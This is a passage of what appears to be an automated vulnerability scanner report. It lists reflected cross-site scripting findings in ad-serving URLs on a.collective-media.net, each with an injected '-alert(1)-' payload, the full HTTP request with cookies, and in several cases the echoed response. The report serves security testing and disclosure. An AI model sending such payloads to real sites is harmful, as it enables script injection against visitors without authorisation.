Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67d6f'-alert(1)-'720b847c210 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_home;sz=728x90;ord=84105094?67d6f'-alert(1)-'720b847c210 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

4.11. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9740'-alert(1)-'a5134f31e3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.bostonf9740'-alert(1)-'a5134f31e3a/bus;sz=728x90;ord=386907169? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

4.12. http://a.collective-media.net/adj/q1.q.boston/bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df57'-alert(1)-'4e26a563c98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/bus5df57'-alert(1)-'4e26a563c98;sz=728x90;ord=386907169? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

4.13. http://a.collective-media.net/adj/q1.q.boston/bus [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/bus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2803'-alert(1)-'241828aa501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/bus;sz=728x90;ord=386907169?&a2803'-alert(1)-'241828aa501=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

4.14. http://a.collective-media.net/adj/q1.q.boston/bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20986'-alert(1)-'b05d3a33d8b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/bus;sz=728x90;ord=386907169?20986'-alert(1)-'b05d3a33d8b HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

4.15. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbb0b'-alert(1)-'5e82e9a4066 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjdbb0b'-alert(1)-'5e82e9a4066/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:39 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10121511467_1311108279","http://ad.doubleclick.net/adjdbb0b'-alert(1)-'5e82e9a4066/q1.q.boston/be_bus;net=q1;u=,q1-10121511467_1311108279,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160",
...[SNIP]...

4.16. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f07c4'-alert(1)-'40a0d6bf13d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.bostonf07c4'-alert(1)-'40a0d6bf13d/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:40 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10223486171_1311108280","http://ad.doubleclick.net/adj/q1.q.bostonf07c4'-alert(1)-'40a0d6bf13d/be_bus;net=q1;u=,q1-10223486171_1311108280,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160","600",false)
...[SNIP]...

4.17. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57876'-alert(1)-'7b7238e5418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.boston/be_bus57876'-alert(1)-'7b7238e5418;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:41 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10120332704_1311108281","http://ad.doubleclick.net/adj/q1.q.boston/be_bus57876'-alert(1)-'7b7238e5418;net=q1;u=,q1-10120332704_1311108281,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160","600",false);</scr'
...[SNIP]...

4.18. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4493a'-alert(1)-'db01ffce823 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.boston/be_bus;sz=4493a'-alert(1)-'db01ffce823 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.19. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a78b9'-alert(1)-'fd7d7acbe2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadja78b9'-alert(1)-'fd7d7acbe2c/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7668
Date: Tue, 19 Jul 2011 20:42:43 GMT
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10114459464_1311108163","http://ad.doubleclick.net/adja78b9'-alert(1)-'fd7d7acbe2c/q1.q.boston/be_home;net=q1;u=,q1-10114459464_1311108163,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.20. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af700'-alert(1)-'6bc1ce727e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.bostonaf700'-alert(1)-'6bc1ce727e7/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:44 GMT
Content-Length: 7668
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10322274056_1311108164","http://ad.doubleclick.net/adj/q1.q.bostonaf700'-alert(1)-'6bc1ce727e7/be_home;net=q1;u=,q1-10322274056_1311108164,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.21. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a6a7'-alert(1)-'89308257669 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.boston/be_home5a6a7'-alert(1)-'89308257669;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:44 GMT
Content-Length: 7668
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10109802729_1311108164","http://ad.doubleclick.net/adj/q1.q.boston/be_home5a6a7'-alert(1)-'89308257669;net=q1;u=,q1-10109802729_1311108164,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/q1.q.boston/be_home [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f18'-alert(1)-'d3edc27fb23 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.q.boston/be_home;sz=71f18'-alert(1)-'d3edc27fb23 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7657
Date: Tue, 19 Jul 2011 20:42:38 GMT
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
ascript">CollectiveMedia.createAndAttachAd("q1-10223658430_1311108158","http://ad.doubleclick.net/adj/q1.q.boston/be_home;net=q1;u=,q1-10223658430_1311108158,11fda490648f83c,none,q1.ent_l;;cmw=nurl;sz=71f18'-alert(1)-'d3edc27fb23;contx=none;dc=w;btg=q1.ent_l?","71f18'-alert(1)-'d3edc27fb23","",false);</scr'+'ipt>
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace44'-alert(1)-'493b799af02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjace44'-alert(1)-'493b799af02/q1.q.boston/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:23 GMT
Content-Length: 7277
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10113876922_1311108263","http://ad.doubleclick.net/adjace44'-alert(1)-'493b799af02/q1.q.boston/bus;net=q1;u=,q1-10113876922_1311108263,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc30'-alert(1)-'57aa03fe9c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

